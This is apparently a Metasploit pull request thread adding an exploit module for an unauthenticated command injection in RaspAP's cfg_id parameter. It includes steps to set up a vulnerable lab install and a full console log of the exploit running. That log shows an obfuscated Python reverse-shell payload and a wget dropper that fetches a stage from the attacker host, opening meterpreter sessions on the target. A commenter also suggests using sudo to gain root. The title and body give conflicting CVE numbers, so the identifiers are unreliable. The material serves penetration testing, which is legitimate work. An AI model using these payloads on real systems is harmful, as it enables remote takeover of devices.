Add RaspAP Unauthenticated Command Injection (CVE-2022-39986) Exploit

[EgeBalci]

Hello 👋

This module exploits the unquthenticated command injection veulnerability (CVE-2023-38096) in the raspap-webgui project.  The vulnerability exists in RaspAP versions 2.8.0 thru 2.8.7. It allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php.

Testing Environment Setup

For installing the vulnerable version follow the steps below,

1. Follow the manual installation steps given here
2. After setting up the service, navigate to the /var/www/html directory
3. Do git checkout 2.8.0 for switching to the vulnerable version

Note: Project can also be installed inside ubuntu/debian docker containers

Verification

List the steps needed to make sure this thing works

• msfconsole
• Do: use exploit/unix/http/raspap_rce
• Do: set RHOST [IP]
• Do: set RPORT [PORT]
• Do: check

[jheysel-r7]

Thanks for the great module @EgeBalci, just a couple minor suggestions.

[jvoisin]

I haven't looked at the configuration of RaspAP, but if the user under which it's running has blanket sudo permissions, it might be nice to prefix the payload with sudo to get root privileges :>

[EgeBalci]

I haven't looked at the configuration of RaspAP, but if the user under which it's running has blanket sudo permissions, it might be nice to prefix the payload with sudo to get root privileges :>

That is not the case for my Ubuntu php7 setup. www-data user is well isolated.

[jheysel-r7]

Thanks @EgeBalci, the module looks great. I just pushed a quick change to update the documentation file to reflect that the default payload for the Unix Command target now returns a meterpreter session. I'll merge this once the CI tests finish running.

msf6 > use raspap
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp

Matching Modules
================

   #  Name                          Disclosure Date  Rank       Check  Description
   -  ----                          ---------------  ----       -----  -----------
   0  exploit/unix/http/raspap_rce  2023-07-31       excellent  Yes    RaspAP Unauthenticated Command Injection


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/http/raspap_rce

[*] Using exploit/unix/http/raspap_rce
msf6 exploit(unix/http/raspap_rce) > set rhosts 172.16.199.130
rhosts => 172.16.199.130
msf6 exploit(unix/http/raspap_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(unix/http/raspap_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Unix Command with echo exec\(__import__\(\'zlib\'\).decompress\(__import__\(\'base64\'\).b64decode\(__import__\(\'codecs\'\).getencoder\(\'utf-8\'\)\(\'eNo9UE1LxDAQPTe/IrckGMNmqZVdrCDiQUQEd28i0iajhqZpSLJaFf+7DVmcwwxv5s2bDzP6KSQcJzVA4t/W9LzvIjQ1jykcVOLJjIBep4BnbBwOnXsDKldsi6oUvhZfxbY0ixLomh/x7uH67mW3f7y5umeZJ9TkHKhEKZHnayEbITcbIQmvF2OZ0gfoBlTBrMCnrJ2Hi2gBPD1jyLZlJ3FwvlMDJZe3hEcRQH3QReBp9Yx0e8SWoc93YwFbcFSzC7vI6ZP/6mlJMwQzKJrPFhrUNPoAMdLyAdE3dU5qyEz+QyLZxl+G/gDVz18D\'\)\[0\]\)\)\) | exec $(which python || which python3 || which python2) -
[*] Sending stage (24772 bytes) to 172.16.199.130
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.130:48494) at 2023-08-14 20:38:21 -0400

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : debian
OS           : Linux 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-2 (2023-07-27)
Architecture : x64
Meterpreter  : python/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.199.130 - Meterpreter session 1 closed.  Reason: Died
msf6 exploit(unix/http/raspap_rce) > set target 1
target => 1
msf6 exploit(unix/http/raspap_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Linux Dropper
[*] Using URL: http://172.16.199.1:8080/JosEJoBU0G8v
[*] Client 172.16.199.130 (Wget/1.21.3) requested /JosEJoBU0G8v
[*] Sending payload to 172.16.199.130 (Wget/1.21.3)
[*] Sending stage (3045380 bytes) to 172.16.199.130
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.130:49950) at 2023-08-14 20:40:51 -0400
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : debian.test.com
OS           : Debian 12.1 (Linux 6.1.0-10-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit

[jheysel-r7]

Release Notes

This PR adds an unauthenticated command injection module for the RaspAP webgui application.